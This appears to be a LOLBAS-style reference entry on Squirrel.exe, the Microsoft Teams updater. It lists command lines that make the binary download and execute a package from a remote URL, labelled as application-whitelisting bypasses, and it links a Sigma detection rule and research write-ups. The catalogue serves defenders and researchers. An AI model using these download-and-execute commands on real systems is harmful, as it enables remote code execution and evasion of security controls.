Squirrel.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Paths

• C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe

Commands

Download

The above binary will go to url and look for RELEASES file and download the nuget package.

Use case: Download binary

Privileges: User

squirrel.exe --download {REMOTEURL}

AWL Bypass

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Use case: Download and execute binary

Privileges: User

squirrel.exe --update {REMOTEURL}

Execute

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Use case: Download and execute binary

Privileges: User

squirrel.exe --update {REMOTEURL}

AWL Bypass

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Use case: Download and execute binary

Privileges: User

squirrel.exe --updateRollback={REMOTEURL}

Execute

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Use case: Download and execute binary

Privileges: User

squirrel.exe --updateRollback={REMOTEURL}

Detection

• Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml

Resources

• https://www.youtube.com/watch?v=rOP3hnkj7ls
• https://twitter.com/reegun21/status/1144182772623269889
• http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
• https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
• https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56